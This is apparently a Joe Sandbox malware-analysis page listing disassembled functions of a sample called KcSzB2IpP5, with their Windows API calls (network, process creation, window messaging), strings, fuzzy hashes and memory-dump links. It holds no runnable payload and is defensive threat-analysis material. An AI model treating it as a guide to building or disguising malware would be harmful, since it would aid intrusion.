Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: d9914b0c9dab8213657b73f05d29f8820b91430b2c5e70e44a92d1cc450a1aa6
Instruction ID: 8ee2f4b97d365e43e6740af5c64e91c3431dfa0a91c328f7eb85fa86c689df6b
Opcode Fuzzy Hash: d9914b0c9dab8213657b73f05d29f8820b91430b2c5e70e44a92d1cc450a1aa6
Instruction Fuzzy Hash: 9B515B61A2C20296CF157719C94537F3FA4AB50B40F308EBBE496423E9DB3D8C859B4E

Function 004E7771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(004B569E,00000000,?,004FCC08,?,00000000,00000000), ref: 004E78DD

Part of subcall function 00466B57: _wcslen.LIBCMT ref: 00466B6A

CharUpperBuffW.USER32(004B569E,00000000,?,004FCC08,00000000,?,00000000,00000000), ref: 004E783B

Strings

<sR, xrefs: 004E77C8

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <sR
API String ID: 3544283678-1397219083
Opcode ID: 27280b86744b03b040001476973b7d3b7c0541681946a3cbd4c88dc56a0ccd46
Instruction ID: eaa5c6ed16385f9b48bf3177bace3def983a87ba949e62dc987f00a76579dedf
Opcode Fuzzy Hash: 27280b86744b03b040001476973b7d3b7c0541681946a3cbd4c88dc56a0ccd46
Instruction Fuzzy Hash: 85619371914158AACF04FBA2CC91DFEB374BF24319B44442BE542B3192FF385A49CBA9

Function 0047E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0047E1B1

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 2b409f76a9e7ebd5ceaf677c3d169d3a08e1b51849519726910e17c83ead8329
Instruction ID: d4ce3e2547fb6138e62daa0de68d2a3ca22f5f7510cb40020b0530898753bdf6
Opcode Fuzzy Hash: 2b409f76a9e7ebd5ceaf677c3d169d3a08e1b51849519726910e17c83ead8329
Instruction Fuzzy Hash: 13516735504246DFDB14DF6AC0806FB7BA4EFA9310F24819BE8419B3D1DA389D43D7A9

Function 0047F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0047F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0047F2BB

Strings

@, xrefs: 0047F2AF

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 0024225e5d01d65ac39ac48e3dfb24211c05d122f9b3ed938707bd15037fe41d
Instruction ID: 70c12ee31317d80d9311df2dcf82d71167060b12625d19ea4a81a0094c0865b3
Opcode Fuzzy Hash: 0024225e5d01d65ac39ac48e3dfb24211c05d122f9b3ed938707bd15037fe41d
Instruction Fuzzy Hash: 025177714187449BD320AF51DC86BABBBF8FF84308F81884EF1D941095EB758529CB6B

Function 004E5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 004E57E0
_wcslen.LIBCMT ref: 004E57EC

Strings

CALLARGARRAY, xrefs: 004E57E6, 004E57EB

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 11feb430c6f2842b2555e835144543a4a6c8a915b51718352903ff612290dceb
Instruction ID: 13e700ffdda3d8987a63aaf53c32b6d4c8862dbf043986efe5a9aac13071b96f
Opcode Fuzzy Hash: 11feb430c6f2842b2555e835144543a4a6c8a915b51718352903ff612290dceb
Instruction Fuzzy Hash: 8F41BF31A001099FCB14EFAAC8819BEBBB5FF59319F10816FE505A7351E7389D91CB98

Function 004DD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004DD130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004DD13A

Strings

|, xrefs: 004DD10B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 4dfc72fd9fc166671b1f6d12b0f53df3afceb22c789c410fda4bd516a4dc70db
Instruction ID: c84e27b0fe06453688725ad27d040485a5b0996011323887f5e759627c4e3a50
Opcode Fuzzy Hash: 4dfc72fd9fc166671b1f6d12b0f53df3afceb22c789c410fda4bd516a4dc70db
Instruction Fuzzy Hash: 00313E71D00109ABCF15EFA5CC95AEF7FB9FF04304F00011AF815A6261E735AA16DB95

Function 004F356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 004F3621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004F365C

Strings

static, xrefs: 004F35BC

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 68886c1d7c9e763d539c283dfc0bf7157c42a1d3c3ebc81bc730d8f04688d633
Instruction ID: c8df6ef43264a37c739dbc536736009c0b37a4439406a8a518707561fa81960c
Opcode Fuzzy Hash: 68886c1d7c9e763d539c283dfc0bf7157c42a1d3c3ebc81bc730d8f04688d633
Instruction Fuzzy Hash: 73318071100608AAEB20DF64DC80ABB73A9FF88724F10961EF995D7290DA35ED91D768

Function 004F4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 004F461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004F4634

Strings

', xrefs: 004F458E

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 1e8dbb5330f6f61c78eee0deb61901321157be2669c5a6febb632f0d01f38548
Instruction ID: d00a755942b9d0d436c38868a6325f36ad810902d3f95a57f0e319a0eb2b7d7a
Opcode Fuzzy Hash: 1e8dbb5330f6f61c78eee0deb61901321157be2669c5a6febb632f0d01f38548
Instruction Fuzzy Hash: 9C311775A01209AFDB14DFA9C980BEB7BB5FF49300F10506AEA04EB391DB74A941CF94

Function 004F31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004F327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004F3287

Strings

Combobox, xrefs: 004F3249

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: aefa8e37fef627ac17e9fb5acd4fa6983e6a92f81ff3a532a5af9d68252c96d0
Instruction ID: c9213e4c5b614d827a3f97686a8b4ae3da54084ed3cc924b1787503f3d7f4929
Opcode Fuzzy Hash: aefa8e37fef627ac17e9fb5acd4fa6983e6a92f81ff3a532a5af9d68252c96d0
Instruction Fuzzy Hash: 5011D07120020C6FFF219E94DC80EBB3B6AEB98365F12412AFA189B290D6399D519764

Function 004F3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0046600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0046604C
Part of subcall function 0046600E: GetStockObject.GDI32(00000011), ref: 00466060
Part of subcall function 0046600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0046606A

GetWindowRect.USER32(00000000,?), ref: 004F377A
GetSysColor.USER32(00000012), ref: 004F3794

Strings

static, xrefs: 004F3757

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: e31563723d6fb6701e5c798ccdce45e0412d57a103e8e539201f09b242959d96
Instruction ID: 0f57e9efb46a36f159f4939c38c19f8b3796d2347d26947f3234be24171941ba
Opcode Fuzzy Hash: e31563723d6fb6701e5c798ccdce45e0412d57a103e8e539201f09b242959d96
Instruction Fuzzy Hash: 17112CB261020DAFDB00DFA8CD45AFA7BF8EB08315F004525FA55E2250D739E861DB54

Function 004DCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004DCD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 004DCDA6

Strings

<local>, xrefs: 004DCD66

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 17e8dfc81b32232ce5d2d5c1d5dc27b24246c91ce80b9015d80e81a217b86b9c
Instruction ID: db3722b6a317e3830e020215bed982046a9ba1684c3683e6b71b54921cfa4c1e
Opcode Fuzzy Hash: 17e8dfc81b32232ce5d2d5c1d5dc27b24246c91ce80b9015d80e81a217b86b9c
Instruction Fuzzy Hash: 5B11A3712456377ADB284A668CD9EF7BEAEEF527A4F004237B10983280D6689841D6F4

Function 004F3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004F34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004F34BA

Strings

edit, xrefs: 004F348F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 8bf5ef9fea25c56833844b170d8b31fc3258b6b85d4086e7f9fb4a494faa7b1a
Instruction ID: c124451a62d8632c67e249b3ad639b229e0d93828e3ef90f9193b5604857cd48
Opcode Fuzzy Hash: 8bf5ef9fea25c56833844b170d8b31fc3258b6b85d4086e7f9fb4a494faa7b1a
Instruction Fuzzy Hash: 2211BF7110010CABEB118E64DC80ABB376AEB04379F504326FA60932D0C779EC519B69

Function 004C6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

CharUpperBuffW.USER32(?,?,?), ref: 004C6CB6
_wcslen.LIBCMT ref: 004C6CC2

Strings

STOP, xrefs: 004C6CBC, 004C6CC1

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 6aceaef67a98cb6ba37ae7878f007bdb81ea496e470bf174bdc18659ce2125b8
Instruction ID: 83be61221bca80c9df13bfe3f7c7810547a293d3b3c8ead79c38f018b0557ef4
Opcode Fuzzy Hash: 6aceaef67a98cb6ba37ae7878f007bdb81ea496e470bf174bdc18659ce2125b8
Instruction Fuzzy Hash: B30104366005268BCB60AFBDDC80EBF37A4EE61714702452EE86393290FB39D800C659

Function 004C1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

Part of subcall function 004C3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004C3CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004C1D4C

Strings

ComboBox, xrefs: 004C1CEB
ListBox, xrefs: 004C1D16

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: e541b1788972048964f3804862d77c113c8d0e9368e66398b100f73757c38fe2
Instruction ID: 9a43bfcbb15ce5e0dc93ae166d5fbe261edb747b6d6517b1d03b9b0494528d2b
Opcode Fuzzy Hash: e541b1788972048964f3804862d77c113c8d0e9368e66398b100f73757c38fe2
Instruction Fuzzy Hash: E901F579600218ABCB04EBA0CD51EFE7768FF13354B00091FB823573D2EA78A9088665

Function 004C1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

Part of subcall function 004C3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004C3CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 004C1C46

Strings

ComboBox, xrefs: 004C1BE5
ListBox, xrefs: 004C1C10

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 19ffcfa7d72a46799b700c0685f44201a7acfc3aef13bcc61f4429d9e8a273b1
Instruction ID: 29653f80c689888f93ec552cca7a2e374c01b0359015745c930aa6fb88b8436b
Opcode Fuzzy Hash: 19ffcfa7d72a46799b700c0685f44201a7acfc3aef13bcc61f4429d9e8a273b1
Instruction Fuzzy Hash: 4301847968110867CB14EB91CA51EFF77AC9F12344F14002FB406672D2FA789E18E6BA

Function 004C1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

Part of subcall function 004C3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004C3CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 004C1CC8

Strings

ComboBox, xrefs: 004C1C69
ListBox, xrefs: 004C1C94

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: a871fda75af2c833e476cb75ca41aba028dd4d29fb9b4d0ebf47bf7fbe835ff5
Instruction ID: b653c426d280ae63da65c02eac6efff47e389bbc8577ab5280b725e99b245c12
Opcode Fuzzy Hash: a871fda75af2c833e476cb75ca41aba028dd4d29fb9b4d0ebf47bf7fbe835ff5
Instruction Fuzzy Hash: 7201847964011867CB04FB91CA51FFF77AC9B12344F14001FB80263292FA789E19D67A

Function 0047A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0047A529

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

Strings

,%S, xrefs: 0047A509
3yK, xrefs: 0047A545, 0047A54D, 0047A552

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%S$3yK
API String ID: 2551934079-2871890959
Opcode ID: a77af158c496b77dc119704f4b2d50e55113278ee3ac875fab8cecad711fd56e
Instruction ID: 40e40ac49ad1c6ed26828cd78a57d4b8ee120f45c0faa815aec8fddb47c1f027
Opcode Fuzzy Hash: a77af158c496b77dc119704f4b2d50e55113278ee3ac875fab8cecad711fd56e
Instruction Fuzzy Hash: 7F017B3170071097C600F779D81BAEE33589B85B14F50441FF5095B2C2EEAD6D058B8F

Function 004F8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00533018,0053305C), ref: 004F81BF
CloseHandle.KERNEL32 ref: 004F81D1

Strings

\0S, xrefs: 004F818A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0S
API String ID: 3712363035-3083024507
Opcode ID: 2c484a9299f510053ff814c94611a0c5749e08917ae42f4fdd906ba4b0f7978f
Instruction ID: 59e2e18dd748ce99ac4c33ed72faebd5129bededd3ecfa74f6f3b0fa5d8d3092
Opcode Fuzzy Hash: 2c484a9299f510053ff814c94611a0c5749e08917ae42f4fdd906ba4b0f7978f
Instruction Fuzzy Hash: 0AF082B1A40304BEF3246761AD89FB73A9CEB14755F000425BF08D52A2D6798E18A7FC

Function 004E747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004E7493
_wcslen.LIBCMT ref: 004E74B9

Strings

3, 3, 16, 1, xrefs: 004E7483

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: aa61f49e0406e9ce83b00391c6c50e850c7a28e6929253d0d06eeeaea7f97db3
Instruction ID: 5c0f5c51b7575ae6a10c07f958c1c13d2c21adc61d6f11794ad2be2cf31b4448
Opcode Fuzzy Hash: aa61f49e0406e9ce83b00391c6c50e850c7a28e6929253d0d06eeeaea7f97db3
